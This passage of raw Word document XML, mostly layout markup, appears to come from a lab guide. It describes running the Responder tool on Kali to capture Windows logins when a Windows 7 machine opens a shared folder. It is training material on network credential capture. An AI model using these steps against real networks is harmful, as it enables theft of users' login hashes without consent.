                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 521" o:spid="_x0000_s1171" style="position:absolute;top:19330;width:6027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25qMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5oqKFqNIrqix10rqLdH82yL&#10;zUtpsrbrr98sCB6HmfmGWaxaU4oH1a6wrGA4iEAQp1YXnCk4Jbv+FITzyBpLy6Tglxyslt3OAmNt&#10;G/6mx9FnIkDYxagg976KpXRpTgbdwFbEwbvZ2qAPss6krrEJcFPKURRNpMGCw0KOFW1ySu/HH6Ng&#10;P63Wl4N9Nln5ed2fv86zbTLzSn302vUchKfWv8Ov9kErGI+G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NuajEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:rPr>
                          <w:t>Login using your user credentials in Windows 7 or 10 machine</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 522" o:spid="_x0000_s1172" style="position:absolute;left:45308;top:19330;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8n38UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGlqYUWrUWTXRY/+WVBvj+bZ&#10;FpuX0kRb/fRGEPY4zMxvmOm8NaW4Ue0KywoG/QgEcWp1wZmCv/1vbwTCeWSNpWVScCcH89lHZ4qJ&#10;tg1v6bbzmQgQdgkqyL2vEildmpNB17cVcfDOtjbog6wzqWtsAtyUMo6ioTRYcFjIsaLvnNLL7moU&#10;rEbV4ri2jyYrl6fVYXMY/+zHXqnuZ7uYgPDU+v/wu73WCr7iG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nyffxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 9232" o:spid="_x0000_s1173" type="#_x0000_t75" style="position:absolute;left:2095;top:6441;width:6477;height:3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six7rGAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO+F/oflCb3VjVFSja5SBFuh&#10;l1RFr8/sMwlm34bsNsZ/3y0IPQ4z8w2zWPWmFh21rrKsYDSMQBDnVldcKDjsN69TEM4ja6wtk4I7&#10;OVgtn58WmGp742/qdr4QAcIuRQWl900qpctLMuiGtiEO3sW2Bn2QbSF1i7cAN7WMoyiRBisOCyU2&#10;tC4pv+5+TKAc8fTxlXX3/ds1iSdZwtn4/KnUy6B/n4Pw1Pv/8KO91Qpm8TiGvzfhCcjl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yLHusYAAADdAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId42" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9235" o:spid="_x0000_s1174" type="#_x0000_t75" style="position:absolute;left:30607;top:5457;width:3968;height:5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OF6x/GAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj09rwkAUxO8Fv8PyBG91Y2xFo6vYQkvp&#10;pdQ/B2+P7DMbzL4N2VdNv323UOhxmJnfMKtN7xt1pS7WgQ1Mxhko4jLYmisDh/3L/RxUFGSLTWAy&#10;8E0RNuvB3QoLG278SdedVCpBOBZowIm0hdaxdOQxjkNLnLxz6DxKkl2lbYe3BPeNzrNspj3WnBYc&#10;tvTsqLzsvryB43sUsQ+tf/X59uOkXZ/b/ZMxo2G/XYIS6uU//Nd+swYW+fQRft+kJ6DX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s4XrH8YAAADdAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId43" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9233" o:spid="_x0000_s1175" type="#_x0000_t75" style="position:absolute;left:11461;top:6727;width:14669;height:27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7ffYrHAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj09rwkAUxO+FfoflCd7qRg2iqatUoRBo&#10;L/4reHtkn0kw+zbsbjX203cFweMwM79h5svONOJCzteWFQwHCQjiwuqaSwX73efbFIQPyBoby6Tg&#10;Rh6Wi9eXOWbaXnlDl20oRYSwz1BBFUKbSemLigz6gW2Jo3eyzmCI0pVSO7xGuGnkKEkm0mDNcaHC&#10;ltYVFeftr1GwOtNXisPD8e/nkO++j5N04/JUqX6v+3gHEagLz/CjnWsFs9F4DPc38QnIxT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G7ffYrHAAAA3QAAAA8AAAAAAAAAAAAA&#10;AAAAnwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACTAwAAAAA=&#10;">
                  <v:imagedata r:id="rId44" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9236" o:spid="_x0000_s1176" type="#_x0000_t75" style="position:absolute;left:13589;top:8632;width:14668;height:27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vVJSbHAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyhF6kbtQSYppVRCj2&#10;VGgsxeMj+5qEZN/G7Gpif323IPQ4zMw3TLYdTSuu1LvasoLFPAJBXFhdc6ng8/j6lIBwHllja5kU&#10;3MjBdjN5yDDVduAPuua+FAHCLkUFlfddKqUrKjLo5rYjDt637Q36IPtS6h6HADetXEZRLA3WHBYq&#10;7GhfUdHkF6PgsOJ38zWbxfrnvEiOZjg1Sf6s1ON03L2A8DT6//C9/aYVrJerGP7ehCcgN7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IvVJSbHAAAA3QAAAA8AAAAAAAAAAAAA&#10;AAAAnwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACTAwAAAAA=&#10;">
                  <v:imagedata r:id="rId45" o:title=""/>
                </v:shape>
                <v:shape id="Picture 580" o:spid="_x0000_s1177" type="#_x0000_t75" style="position:absolute;left:34869;top:5913;width:8915;height:24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Hhc3PCAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxET0trwkAQvgv+h2UKvemmQkuIrtJaWwql&#10;gs/zmJ08MDsbslNN/333IHj8+N6zRe8adaEu1J4NPI0TUMS5tzWXBva7j1EKKgiyxcYzGfijAIv5&#10;cDDDzPorb+iylVLFEA4ZGqhE2kzrkFfkMIx9Sxy5wncOJcKu1LbDawx3jZ4kyYt2WHNsqLClZUX5&#10;efvrDMjnuzQ/h9OqcOtlnha7yffq7WjM40P/OgUl1MtdfHN/WQPPaZwfz8QjoO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h4XNzwgAAANwAAAAPAAAAAAAAAAAAAAAAAJ8C&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAjgMAAAAA&#10;">
                  <v:imagedata r:id="rId46" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 581" o:spid="_x0000_s1178" style="position:absolute;left:35783;top:6736;width:8527;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vmksQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q64FKrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrGA4iEAQp1YXnCk4Htb9GITzyBpLy6TglxzMZ93OFBNt&#10;G/6hx95nIkDYJagg975KpHRpTgbdwFbEwbva2qAPss6krrEJcFPKzyj6kgYLDgs5VrTMKb3t70bB&#10;Jq4W5639a7Jyddmcdqfx92HslfrotYsJCE+tf4df7a1WMIqH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r5pLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ACCB6000</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 582" o:spid="_x0000_s1179" style="position:absolute;left:42199;top:6690;width:380;height:2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l45cYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3uqmAUuMrhK0Eo+tCra3R/aZ&#10;hGbfhuw2SfvruwXB4zAz3zCrzWga0VPnassKnmcRCOLC6ppLBefT/ikB4TyyxsYyKfghB5v15GGF&#10;qbYDv1N/9KUIEHYpKqi8b1MpXVGRQTezLXHwrrYz6IPsSqk7HALcNDKOohdpsOawUGFL24qKr+O3&#10;UZAnbfZxsL9D2bx+5pe3y2J3WnilHqdjtgThafT38K190ArmSQz/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vl45cYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 584" o:spid="_x0000_s1180" type="#_x0000_t75" style="position:absolute;left:8580;top:5334;width:8915;height:24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7adXDGAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj0tLA0EQhO+C/2FoITczm6Bh2WQSYkxE&#10;kAh5eW53eh+407PstMn67x0h4LGoqq+o2aJ3jTpTF2rPBkbDBBRx7m3NpYHjYXOfggqCbLHxTAZ+&#10;KMBifnszw8z6C+/ovJdSRQiHDA1UIm2mdcgrchiGviWOXuE7hxJlV2rb4SXCXaPHSTLRDmuOCxW2&#10;tKoo/9p/OwPy8izN9vS5Ltz7Kk+Lw/ht/fRhzOCuX05BCfXyH762X62Bx/QB/s7EI6Dn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Htp1cMYAAADcAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId46" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 585" o:spid="_x0000_s1181" style="position:absolute;left:9494;top:6156;width:8608;height:2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DgkcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3ppNC0qM2QTRFj22KtjeHtln&#10;Epp9G7Jbk/rruwXB4zAz3zBZMZpWXKh3jWUFz1EMgri0uuFKwfHw9pSAcB5ZY2uZFPySgyKfPGSY&#10;ajvwB132vhIBwi5FBbX3XSqlK2sy6CLbEQfvbHuDPsi+krrHIcBNK1/ieC4NNhwWauxoXVP5vf8x&#10;CrZJt/rc2etQta9f29P7abE5LLxSj9NxtQThafT38K290wpmyQz+z4QjI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RDgkcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ACCA6000</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 586" o:spid="_x0000_s1182" style="position:absolute;left:15956;top:6111;width:380;height:2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J+5sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGmqoNRqFNl10aN/FtTbo3m2&#10;xealNFlb/fRGEPY4zMxvmNmiNaW4Ue0KywoG/QgEcWp1wZmC38NPLwbhPLLG0jIpuJODxfyjM8NE&#10;24Z3dNv7TAQIuwQV5N5XiZQuzcmg69uKOHgXWxv0QdaZ1DU2AW5KOYyisTRYcFjIsaKvnNLr/s8o&#10;WMfV8rSxjyYrV+f1cXucfB8mXqnuZ7ucgvDU+v/wu73RCkbx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wn7mxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 9234" o:spid="_x0000_s1183" type="#_x0000_t75" style="position:absolute;left:4889;top:10791;width:4382;height:43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Zz38zDAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyBC+im2opJrqKFJVC&#10;TzWC10f2mQSzb8PuauK/d4VCj8PMfMOsNr1pxJ2cry0reJ8mIIgLq2suFZzy/WQBwgdkjY1lUvAg&#10;D5v14G2FmbYd/9L9GEoRIewzVFCF0GZS+qIig35qW+LoXawzGKJ0pdQOuwg3jZwlyac0WHNcqLCl&#10;r4qK6/FmFJzz9NBzOpampm6fp2NHuPtRajTst0sQgfrwH/5rf2sF6Wz+Aa838QnI9R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nPfzMMAAADdAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;">
                  <v:imagedata r:id="rId47" o:title=""/>
                </v:shape>
                <v:shape id="Picture 589" o:spid="_x0000_s1184" type="#_x0000_t75" style="position:absolute;left:3581;top:14843;width:8915;height:24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Db2u7GAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj0tLA0EQhO+C/2FoIbdkNgFl3WQSYkxE&#10;kAh5eW53eh+407PstMn67x0h4LGoqq+o2aJ3jTpTF2rPBsajBBRx7m3NpYHjYTNMQQVBtth4JgM/&#10;FGAxv72ZYWb9hXd03kupIoRDhgYqkTbTOuQVOQwj3xJHr/CdQ4myK7Xt8BLhrtGTJHnQDmuOCxW2&#10;tKoo/9p/OwPy8izN9vS5Ltz7Kk+Lw+Rt/fRhzOCuX05BCfXyH762X62B+/QR/s7EI6Dn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8Nva7sYAAADcAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId46" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 590" o:spid="_x0000_s1185" style="position:absolute;left:4495;top:15666;width:8609;height:2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7V1MEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TRUU2zGK+ECXjgo6u0tzpy3T&#10;3JQm2urXm8WAy8N5z5etKcWDaldYVjAaRiCIU6sLzhRczrvBDITzyBpLy6TgSQ6Wi25njom2DX/T&#10;4+QzEULYJagg975KpHRpTgbd0FbEgfu1tUEfYJ1JXWMTwk0px1E0lQYLDg05VrTOKf073Y2C/axa&#10;3Q721WTl9md/PV7jzTn2SvV77eoLhKfWf8T/7oNWMInD/H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y+1dTBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ACCA6000 </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 591" o:spid="_x0000_s1186" style="position:absolute;left:10957;top:15621;width:380;height:2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wT8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q64GKrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrGA4iEAQp1YXnCk4Htb9MQjnkTWWlknBLzmYz7qdKSba&#10;NvxDj73PRICwS1BB7n2VSOnSnAy6ga2Ig3e1tUEfZJ1JXWMT4KaUn1H0JQ0WHBZyrGiZU3rb342C&#10;zbhanLf2r8nK1WVz2p3i70PslfrotYsJCE+tf4df7a1WMIqH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ycE/EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 9237" o:spid="_x0000_s1187" type="#_x0000_t75" style="position:absolute;left:45815;top:11807;width:2381;height:23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C0o8DFAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FLw0AUhO+C/2F5BW9201isxm6CCkLx&#10;liZFvT2yz2ww+zZk13b9964g9DjMzDfMtop2FEea/eBYwWqZgSDunB64V9A2L9d3IHxA1jg6JgU/&#10;5KEqLy+2WGh34pqO+9CLBGFfoAITwlRI6TtDFv3STcTJ+3SzxZDk3Es94ynB7SjzLLuVFgdOCwYn&#10;ejbUfe2/rYLI+bt8Wuvmo81e6yYeanrTRqmrRXx8ABEohnP4v73TCu7zmw38vUlPQJa/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gtKPAxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9238" o:spid="_x0000_s1188" type="#_x0000_t75" style="position:absolute;left:47847;top:9965;width:4699;height:46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xOdBXEAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj8FKw0AQhu+C77CM4EXsxhXFpt2WIgji&#10;zWo9D9lpEpqdjdlpEt/eOQgeh3/+b75Zb+fYmZGG3Cb2cLcowBBXKbRce/j8eLl9ApMFOWCXmDz8&#10;UIbt5vJijWVIE7/TuJfaKIRziR4akb60NlcNRcyL1BNrdkxDRNFxqG0YcFJ47KwrikcbsWW90GBP&#10;zw1Vp/05qsZODue36ebBLQ8xCTt3+h6/vL++mncrMEKz/C//tV+Dh6W7V139RhFgN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xOdBXEAAAA3QAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId49" o:title=""/>
                </v:shape>
                <v:shape id="Shape 596" o:spid="_x0000_s1189" style="position:absolute;left:14523;top:13295;width:28112;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="28112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80WcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0YrCMBRE34X9h3CFfZE1XcVWq1F0QfBNWv2AS3O3&#10;rTY3pYla/94IC/s4zMwZZrXpTSPu1LnasoLvcQSCuLC65lLB+bT/moNwHlljY5kUPMnBZv0xWGGq&#10;7YMzuue+FAHCLkUFlfdtKqUrKjLoxrYlDt6v7Qz6ILtS6g4fAW4aOYmiWBqsOSxU2NJPRcU1vxkF&#10;8+P0NmrLJIlPcrfYJnl8STJU6nPYb5cgPPX+P/zXPmgFs0UM7zPhCMj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v80WcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l2811234,e" filled="f" strokecolor="#497dba">
                  <v:path arrowok="t" textboxrect="0,0,2811234,0"/>
                </v:shape>
                <v:shape id="Shape 597" o:spid="_x0000_s1190" style="position:absolute;left:42508;top:12914;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QcRsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UJ3urGgn8SXaW0ilKkUPWgt0f2&#10;mQSzb9PsGuO3d4WCx2FmfsNM560pRUO1Kywr6PciEMSp1QVnCva75dsYhPPIGkvLpOBGDuaz15cp&#10;Jtpe+Zearc9EgLBLUEHufZVI6dKcDLqerYiDd7K1QR9knUld4zXATSnfo2goDRYcFnKs6DOn9Ly9&#10;GAXl94/R8fFr1MSrsd0s/hYYHc5KdTvtxwSEp9Y/w//ttVYwiEfwOBOOgJ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oQcRsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m,l76200,38100,,76200,,xe" fillcolor="#497dba" stroked="f" strokeweight="0">
                  <v:path arrowok="t" textboxrect="0,0,76200,76200"/>
                </v:shape>
                <v:shape id="Shape 598" o:spid="_x0000_s1191" style="position:absolute;left:13888;top:12914;width:762;height:762;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="762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uINMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdC/7DcAvudFLB1qROgvigpUihaRe6u2Ru&#10;k2DmTsyMMf37zqLg8nDeq2wwjeipc7VlBY+zCARxYXXNpYLvr/10CcJ5ZI2NZVLwSw6ydDxaYaLt&#10;jT+pz30pQgi7BBVU3reJlK6oyKCb2ZY4cD+2M+gD7EqpO7yFcNPIeRQ9SYM1h4YKW9pUVJzzq1HQ&#10;vH8YHZ+2z338urSH3WWH0fGs1ORhWL+A8DT4u/jf/aYVLOKwNpwJR0C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biDTEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m76200,r,76200l,38100,76200,xe" fillcolor="#497dba" stroked="f" strokeweight="0">
                  <v:path arrowok="t" textboxrect="0,0,76200,76200"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="217" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NBT-NS, LLMNR &amp; MDNS Responder 3.0.2.0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="217" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">About this tool: Author: Laurent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Gaffie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t>laurent.gaffie@gmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="206" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Responder in Kali should start listening for events. Go to Win 7 PC Machine and try to access any shared folder.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Win +r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> \\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">nitheesh  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Press Enter </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back to Kali and look out for the logs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
